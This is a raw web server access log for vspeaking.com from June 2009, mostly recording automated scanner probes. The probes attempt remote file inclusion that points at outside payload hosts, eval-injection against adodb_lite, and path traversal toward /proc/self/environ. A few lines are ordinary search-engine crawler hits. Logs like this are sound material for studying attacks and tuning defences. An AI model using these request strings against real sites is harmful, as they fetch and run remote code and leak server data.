91.195.124.16 - - [28/Jun/2009:19:17:25 -0700] "GET /logs/access.log//errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
200.93.147.154 - - [28/Jun/2009:19:21:21 -0700] "GET /?sourcedir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "vspeaking.com"
200.93.147.154 - - [28/Jun/2009:19:21:21 -0700] "GET /logs/?sourcedir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 200 2368 "-" "Mozilla/5.0" "vspeaking.com"
200.93.147.154 - - [28/Jun/2009:19:21:49 -0700] "GET /logs/access.log%20%20/?sourcedir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "vspeaking.com"
200.93.147.154 - - [28/Jun/2009:19:21:49 -0700] "GET /logs/?sourcedir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 200 2368 "-" "Mozilla/5.0" "vspeaking.com"
200.93.147.154 - - [28/Jun/2009:19:21:49 -0700] "GET /?sourcedir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "vspeaking.com"
200.93.147.154 - - [28/Jun/2009:19:21:50 -0700] "GET /logs/access.log%20%20/?sourcedir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "vspeaking.com"
200.93.147.154 - - [28/Jun/2009:19:22:11 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.unreals.co.cc/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.vspeaking.com"
200.93.147.154 - - [28/Jun/2009:19:22:11 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.unreals.co.cc/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.vspeaking.com"
200.93.147.154 - - [28/Jun/2009:19:22:11 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.unreals.co.cc/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.vspeaking.com"
66.46.177.182 - - [28/Jun/2009:19:22:46 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.unreals.co.cc/v7.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
66.46.177.182 - - [28/Jun/2009:19:22:50 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.unreals.co.cc/v7.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
66.46.177.182 - - [28/Jun/2009:19:22:50 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.unreals.co.cc/v7.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
201.232.54.48 - - [28/Jun/2009:19:22:53 -0700] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://aboutav.com//back/oh.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
201.232.54.48 - - [28/Jun/2009:19:22:53 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://aboutav.com//back/oh.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
201.232.54.48 - - [28/Jun/2009:19:22:53 -0700] "GET /logs/access.log%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://aboutav.com//back/oh.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
218.146.231.193 - - [28/Jun/2009:19:23:33 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.unreals.co.cc/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.vspeaking.com"
218.146.231.193 - - [28/Jun/2009:19:23:33 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.unreals.co.cc/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.vspeaking.com"
218.146.231.193 - - [28/Jun/2009:19:23:33 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.unreals.co.cc/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.vspeaking.com"
201.232.54.48 - - [28/Jun/2009:19:26:03 -0700] "GET /logs/access.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://aboutav.com//back/oh.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
201.232.54.48 - - [28/Jun/2009:19:26:03 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://aboutav.com//back/oh.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
201.232.54.48 - - [28/Jun/2009:19:26:03 -0700] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://aboutav.com//back/oh.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
201.232.54.48 - - [28/Jun/2009:19:26:12 -0700] "GET /logs/access.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://aboutav.com//back/oh.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
211.203.180.144 - - [28/Jun/2009:19:28:06 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
211.203.180.144 - - [28/Jun/2009:19:28:06 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
211.203.180.144 - - [28/Jun/2009:19:28:06 -0700] "GET /logs/access.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
211.203.180.144 - - [28/Jun/2009:19:28:10 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
211.203.180.144 - - [28/Jun/2009:19:28:10 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
211.203.180.144 - - [28/Jun/2009:19:28:11 -0700] "GET /logs/access.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
194.63.248.44 - - [28/Jun/2009:19:29:48 -0700] "GET /bemarket/postscript/postscript.php?p_mode=http://auction.localtreasures.net/includes/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
194.63.248.44 - - [28/Jun/2009:19:29:48 -0700] "GET /logs/access.log/bemarket/postscript/postscript.php?p_mode=http://auction.localtreasures.net/includes/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
194.63.248.44 - - [28/Jun/2009:19:29:48 -0700] "GET /logs/bemarket/postscript/postscript.php?p_mode=http://auction.localtreasures.net/includes/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
203.235.1.115 - - [28/Jun/2009:19:32:47 -0700] "GET /logs/homepage.php?sel=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.vspeaking.com"
203.235.1.115 - - [28/Jun/2009:19:32:48 -0700] "GET /logs/errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.vspeaking.com"
203.235.1.115 - - [28/Jun/2009:19:32:49 -0700] "GET /logs/homepage.php?sel=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
203.235.1.115 - - [28/Jun/2009:19:32:49 -0700] "GET /logs/homepage.php?sel=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
203.235.1.115 - - [28/Jun/2009:19:32:53 -0700] "GET /homepage.php?sel=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.vspeaking.com"
203.235.1.115 - - [28/Jun/2009:19:32:53 -0700] "GET /errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.vspeaking.com"
203.235.1.115 - - [28/Jun/2009:19:32:54 -0700] "GET /homepage.php?sel=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
203.235.1.115 - - [28/Jun/2009:19:32:54 -0700] "GET /homepage.php?sel=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
216.45.56.47 - - [28/Jun/2009:19:32:55 -0700] "GET /logs/access_090413.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.vspeaking.com"
216.45.56.47 - - [28/Jun/2009:19:32:55 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.vspeaking.com"
216.45.56.47 - - [28/Jun/2009:19:32:55 -0700] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.vspeaking.com"
201.232.54.48 - - [28/Jun/2009:19:33:36 -0700] "GET /logs/access.log%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://aboutav.com//back/oh.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
65.23.158.226 - - [28/Jun/2009:19:39:22 -0700] "GET /logs/access_090413.log/phphtml.php?htmlclass_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.vspeaking.com"
65.23.158.226 - - [28/Jun/2009:19:39:22 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.vspeaking.com"
65.23.158.226 - - [28/Jun/2009:19:39:22 -0700] "GET /phphtml.php?htmlclass_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.vspeaking.com"
194.165.34.49 - - [28/Jun/2009:19:40:08 -0700] "GET /logs/access_090413.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
194.165.34.49 - - [28/Jun/2009:19:40:09 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
194.165.34.49 - - [28/Jun/2009:19:40:09 -0700] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
65.23.158.226 - - [28/Jun/2009:19:41:30 -0700] "GET /phphtml.php?htmlclass_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.vspeaking.com"
65.23.158.226 - - [28/Jun/2009:19:41:30 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.vspeaking.com"
65.23.158.226 - - [28/Jun/2009:19:41:30 -0700] "GET /logs/access_090413.log/phphtml.php?htmlclass_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.vspeaking.com"
65.23.158.226 - - [28/Jun/2009:19:41:32 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.vspeaking.com"
65.23.158.226 - - [28/Jun/2009:19:42:01 -0700] "GET /phphtml.php?htmlclass_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.vspeaking.com"
65.23.158.226 - - [28/Jun/2009:19:42:01 -0700] "GET /logs/access_090413.log/phphtml.php?htmlclass_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.vspeaking.com"
65.23.158.226 - - [28/Jun/2009:19:42:01 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.vspeaking.com"
65.55.209.11 - - [28/Jun/2009:19:42:22 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.vspeaking.com"
65.55.209.11 - - [28/Jun/2009:19:42:22 -0700] "GET /tmp/?D=A HTTP/1.1" 200 520 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.vspeaking.com"
65.23.158.226 - - [28/Jun/2009:19:45:26 -0700] "GET /phphtml.php?htmlclass_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "vspeaking.com"
65.23.158.226 - - [28/Jun/2009:19:45:26 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "vspeaking.com"
65.23.158.226 - - [28/Jun/2009:19:45:26 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "vspeaking.com"
65.23.158.226 - - [28/Jun/2009:19:45:37 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.vspeaking.com"
65.23.158.226 - - [28/Jun/2009:19:45:42 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.vspeaking.com"
218.234.21.178 - - [28/Jun/2009:19:47:34 -0700] "GET /phphtml.php?htmlclass_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.vspeaking.com"
218.234.21.178 - - [28/Jun/2009:19:47:34 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.vspeaking.com"
218.234.21.178 - - [28/Jun/2009:19:47:35 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.vspeaking.com"
65.55.106.159 - - [28/Jun/2009:19:50:03 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.vspeaking.com"
65.23.158.226 - - [28/Jun/2009:19:52:08 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "vspeaking.com"
65.23.158.226 - - [28/Jun/2009:19:52:08 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "vspeaking.com"
65.23.158.226 - - [28/Jun/2009:19:52:08 -0700] "GET /phphtml.php?htmlclass_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "vspeaking.com"
218.234.21.178 - - [28/Jun/2009:19:52:08 -0700] "GET /phphtml.php?htmlclass_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.vspeaking.com"
218.234.21.178 - - [28/Jun/2009:19:52:08 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.vspeaking.com"
218.234.21.178 - - [28/Jun/2009:19:52:08 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.vspeaking.com"
65.23.158.226 - - [28/Jun/2009:19:52:35 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "vspeaking.com"
65.23.158.226 - - [28/Jun/2009:19:52:35 -0700] "GET /phphtml.php?htmlclass_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "vspeaking.com"
65.23.158.226 - - [28/Jun/2009:19:52:35 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "vspeaking.com"
72.30.78.251 - - [28/Jun/2009:19:54:32 -0700] "GET /logs/?N=D HTTP/1.0" 200 2352 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.vspeaking.com"
218.234.21.178 - - [28/Jun/2009:19:56:38 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "vspeaking.com"
218.234.21.178 - - [28/Jun/2009:19:56:38 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "vspeaking.com"
218.234.21.178 - - [28/Jun/2009:19:56:38 -0700] "GET /phphtml.php?htmlclass_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "vspeaking.com"
60.43.229.5 - - [28/Jun/2009:19:57:13 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom%5Bjm_dir%5D=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
60.43.229.5 - - [28/Jun/2009:19:57:13 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom%5Bjm_dir%5D=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
60.43.229.5 - - [28/Jun/2009:19:57:13 -0700] "GET /logs/access_090105.log/include/plugins/jrBrowser/purchase.php?jamroom%5Bjm_dir%5D=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
218.146.231.193 - - [28/Jun/2009:19:58:54 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.unreals.co.cc/v7.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
218.146.231.193 - - [28/Jun/2009:19:58:55 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.unreals.co.cc/v7.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
218.146.231.193 - - [28/Jun/2009:19:58:55 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.unreals.co.cc/v7.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
65.23.158.226 - - [28/Jun/2009:20:00:25 -0700] "GET /logs//login.php?dir=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.vspeaking.com"
65.23.158.226 - - [28/Jun/2009:20:00:25 -0700] "GET /logs/access.log//login.php?dir=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.vspeaking.com"
65.23.158.226 - - [28/Jun/2009:20:00:25 -0700] "GET /login.php?dir=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.vspeaking.com"
65.23.158.226 - - [28/Jun/2009:20:00:36 -0700] "GET /logs/access.log//login.php?dir=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.vspeaking.com"
65.23.158.226 - - [28/Jun/2009:20:00:36 -0700] "GET /login.php?dir=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.vspeaking.com"
65.23.158.226 - - [28/Jun/2009:20:00:36 -0700] "GET /logs//login.php?dir=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.vspeaking.com"
218.234.21.178 - - [28/Jun/2009:20:00:55 -0700] "GET /logs/access.log//login.php?dir=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.vspeaking.com"
218.234.21.178 - - [28/Jun/2009:20:00:55 -0700] "GET /logs//login.php?dir=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.vspeaking.com"
218.234.21.178 - - [28/Jun/2009:20:00:55 -0700] "GET /login.php?dir=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.vspeaking.com"
